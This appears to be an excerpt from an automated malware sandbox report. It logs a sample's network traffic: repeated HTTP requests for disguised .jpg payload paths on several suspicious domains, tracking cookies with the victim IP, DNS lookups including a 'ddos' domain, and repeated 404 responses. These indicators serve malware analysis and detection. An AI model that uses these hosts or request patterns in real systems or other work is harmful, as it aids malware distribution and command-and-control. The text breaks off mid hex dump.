        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a8241ece=-1855376372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91387e43=-1405817186 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2322230a=-1347768526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5e41367=98833255 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159482|1720159260|4|54|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8effb8fc=117276892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1964acc0=1278084672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d090ea93=-795809133 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ba60573=343684734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?fc675e35=-120669078 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159486|1720159260|4|55|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9a7e303d=-814051145 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?325396b5=-1835223640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?17f3b14d=-1883887666 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159489|1720159259|4|56|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?912c2e80=445489792 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159490|1720159259|4|56|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1ad41f3e=450109246 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159490|1720159260|4|56|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d1cd8e49=1614413969 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?45eba6e7=794638136 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8021ab3c=-2145277124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159493|1720159259|4|57|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a8434aa9=-1471984983 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159494|1720159259|4|57|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b7b2891=1733586201 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159494|1720159260|4|57|0; snkz=8.46.123.33
        Source: SearchApp.exe, 0000001F.00000000.1593174717.000001D62DC64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: $www.google.www.yahoo.cn.bing.https://www.baidu.www.bing.www.yandex.google chrome equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
        Source: global trafficDNS traffic detected: DNS query: althawry.org
        Source: global trafficDNS traffic detected: DNS query: www.careerdesk.org
        Source: global trafficDNS traffic detected: DNS query: arthur.niria.biz
        Source: global trafficDNS traffic detected: DNS query: amsamex.com
        Source: global trafficDNS traffic detected: DNS query: apple-pie.in
        Source: global trafficDNS traffic detected: DNS query: ahmediye.net
        Source: global trafficDNS traffic detected: DNS query: g2.arrowhitech.com
        Source: global trafficDNS traffic detected: DNS query: ampyazilim.com.tr
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:01 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:06 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:10 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:14 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:18 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:22 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:25 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:29 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:32 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:36 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:41 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:45 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:01:49 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 